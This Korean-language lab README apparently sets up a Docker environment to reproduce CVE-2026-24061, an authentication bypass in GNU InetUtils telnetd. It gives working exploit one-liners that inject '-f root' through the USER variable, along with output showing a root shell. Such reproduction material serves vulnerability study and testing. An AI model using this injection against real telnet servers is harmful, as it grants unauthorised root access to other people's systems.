
GNU InetUtils의 GNU telnetd 서비스 인증 우회
2026년 1월, GNU InetUtils의 GNU telnetd 서비스에서 Kyu Neushwaistein (일명 Carlos Cortes Alvarez)이 인증 우회 취약점을 발견했습니다. CVE-2026-24061로 추적되는 이 결함은 공격자가 유효한 자격 증명을 제공하지 않고도 Telnet 세션을 설정하여 대상 시스템에 대한 무단 액세스를 허용합니다. 이 취약점은 GNU telnetd 서비스의 2.7-2 버전까지 존재하며, 90년대에서 그대로 가져온 것처럼 보입니다.
이는 CVSS v3.1 점수 9.8 (치명적) 인 인수 주입 취약점(CWE-88)입니다.
참고 자료:
빌드 및 실행:
docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061
서비스가 시작된 후 telnetd는 포트 23에서 수신 대기합니다.
이 취약점은 USER 환경 변수에 -f 플래그를 주입하여 인증을 우회할 수 있게 합니다. telnetd가 -f로 시작하는 사용자 이름을 수신하면 이를 login 프로그램에 전달하고, login 프로그램은 -f를 인증을 건너뛰는 플래그로 해석합니다.
다음 명령을 사용하여 이 취약점을 악용하고 root 액세스 권한을 얻을 수 있습니다:
# Linux 클라이언트 (-a 옵션 필요)
USER="-f root" telnet -a 127.0.0.1 23
# macOS 클라이언트 (-a 옵션 불필요)
USER="-f root" telnet 127.0.0.1 23
성공적으로 악용한 후에는 비밀번호를 제공하지 않고도 root 셸에 액세스할 수 있습니다.
$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)
Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)